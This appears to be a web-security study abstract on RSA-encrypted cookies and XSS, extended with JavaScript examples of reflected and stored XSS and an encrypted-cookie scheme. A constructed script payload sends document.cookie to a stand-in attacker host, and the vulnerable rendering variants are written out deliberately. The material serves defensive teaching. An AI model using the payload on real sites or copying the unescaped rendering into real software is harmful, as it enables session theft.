Improving Web Application Security Using Penetration Testing

The main issue with current web applications is that user information can be obtained easily by unauthorized persons. Many web applications are built entirely with scripting languages that expose the user authentication code to the web browser, and all parameters are passed through the query string (URL) of the application. Application security of this kind fails when it is verified by penetration testing based on cross-site scripting (XSS). This study addresses these security issues by developing a web application in which the user codes are encrypted with the RSA algorithm and stored in cookies, with cross-domain verification performed on the encrypted user code. XSS vulnerabilities come in different forms and may be categorized into two varieties: reflected and stored. Reflected XSS is a type of attack performed against applications that echo user-supplied input back to the user in a dynamically generated page, such as an error message. Stored XSS appears when data submitted by one user is stored in the application or in the back-end database and later displayed to other users. The browser cookies store only the encrypted key values. These techniques were applied to an enterprise web application that supports multiple organizations for processing product purchase orders, sales orders and invoice details.
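The reflected and stored XSS varieties described above, as an added example that is not code from the paper: a minimal server-side renderer with the vulnerable and the escaped form of each side by side. The error page, the comment store, the payload and the helper names (escapeHtml, renderErrorPage, submitComment, renderComments, runDemo) are all constructed for this illustration and assume nothing about the paper's application.

```javascript
// Added example, not from the paper: reflected vs. stored XSS in a small
// server-side renderer, each shown in a vulnerable and a hardened variant.
// All inputs below are constructed for the demonstration.

// HTML-escape untrusted text before placing it in an HTML body or attribute.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Reflected XSS: a dynamic error page echoes the "page" query parameter.
// With escape=false the raw value is interpolated into the response and a
// script tag in the URL executes in the victim's browser.
function renderErrorPage(query, { escape }) {
  const missing = query.get('page') || '';
  const shown = escape ? escapeHtml(missing) : missing;
  return `<html><body><p>Error: page "${shown}" was not found.</p></body></html>`;
}

// Stored XSS: one user's submission is persisted and later rendered to every
// other user. An in-memory array stands in for the back-end database.
const comments = [];
function submitComment(author, text) {
  comments.push({ author, text });
}
function renderComments({ escape }) {
  const items = comments.map(({ author, text }) => {
    const a = escape ? escapeHtml(author) : author;
    const t = escape ? escapeHtml(text) : text;
    return `<li><b>${a}</b>: ${t}</li>`;
  });
  return `<ul>${items.join('')}</ul>`;
}

// Constructed payload of the kind an attacker would craft; the "victim" is
// reduced to a check for a live script tag in the rendered HTML.
const PAYLOAD = '<script>location="https://attacker.example/?c="+document.cookie</script>';
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Returns, for each variant, whether the payload survives into the page.
function runDemo() {
  comments.length = 0;
  const q = new URLSearchParams({ page: PAYLOAD });
  submitComment('mallory', PAYLOAD);
  return {
    reflectedVulnerable: containsScriptTag(renderErrorPage(q, { escape: false })),
    reflectedHardened: containsScriptTag(renderErrorPage(q, { escape: true })),
    storedVulnerable: containsScriptTag(renderComments({ escape: false })),
    storedHardened: containsScriptTag(renderComments({ escape: true })),
  };
}

console.log(runDemo());
```

Escaping at the point of output is the control that distinguishes the two hardened variants from the vulnerable ones; the difference between reflected and stored XSS lies only in where the untrusted string comes from (the request versus the database), not in the fix.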
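The cookie scheme the abstract sketches, where the browser holds only an RSA ciphertext of the user code, as an added example written for this page rather than taken from the paper. It uses Node's built-in crypto module (RSA-OAEP with SHA-256); the key pair, the cookie name ucode, the user code value and the function names issueUserCodeCookie and recoverUserCode are assumptions for the illustration.

```javascript
// Added example, not the paper's code: the server keeps an RSA private key,
// encrypts the user code under the public key at login, and stores only the
// ciphertext in the cookie. On later requests it decrypts the cookie value.
// Key pair and user code are constructed here for the demonstration.
const crypto = require('crypto');

const { publicKey, privateKey } = crypto.generateKeyPairSync('rsa', { modulusLength: 2048 });
const OAEP = { padding: crypto.constants.RSA_PKCS1_OAEP_PADDING, oaepHash: 'sha256' };

// Login: encrypt the user code and build the Set-Cookie header. Secure and
// HttpOnly keep the ciphertext off plaintext links and out of reach of
// page scripts (the XSS payloads above read document.cookie).
function issueUserCodeCookie(userCode) {
  const ct = crypto.publicEncrypt({ key: publicKey, ...OAEP }, Buffer.from(userCode, 'utf8'));
  const value = ct.toString('base64');
  return {
    value,
    setCookie: `ucode=${value}; Secure; HttpOnly; SameSite=Strict; Path=/`,
  };
}

// Later request: pull ucode out of the Cookie header and decrypt it.
// Returns null when the cookie is missing, tampered with, or was not
// produced under this server's public key (OAEP padding check fails).
function recoverUserCode(cookieHeader) {
  const m = /(?:^|;\s*)ucode=([A-Za-z0-9+/=]+)/.exec(cookieHeader || '');
  if (!m) return null;
  try {
    const pt = crypto.privateDecrypt({ key: privateKey, ...OAEP }, Buffer.from(m[1], 'base64'));
    return pt.toString('utf8');
  } catch (e) {
    return null;
  }
}

// Demo: issue a cookie for a constructed user code, then read it back.
const issued = issueUserCodeCookie('ORG42-USER7');
console.log(issued.setCookie);
console.log('recovered:', recoverUserCode(`sid=abc; ${issued.value ? 'ucode=' + issued.value : ''}`));
```

Encrypting the code hides it from anyone who reads the cookie, which is the property the abstract claims, but the cookie is still a bearer token: whoever copies it is accepted as that user, and RSA encryption alone neither binds the value to a session nor expires it. In practice the HttpOnly and Secure attributes, a short lifetime, and an authenticated token format carry more of the security than the choice of cipher.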
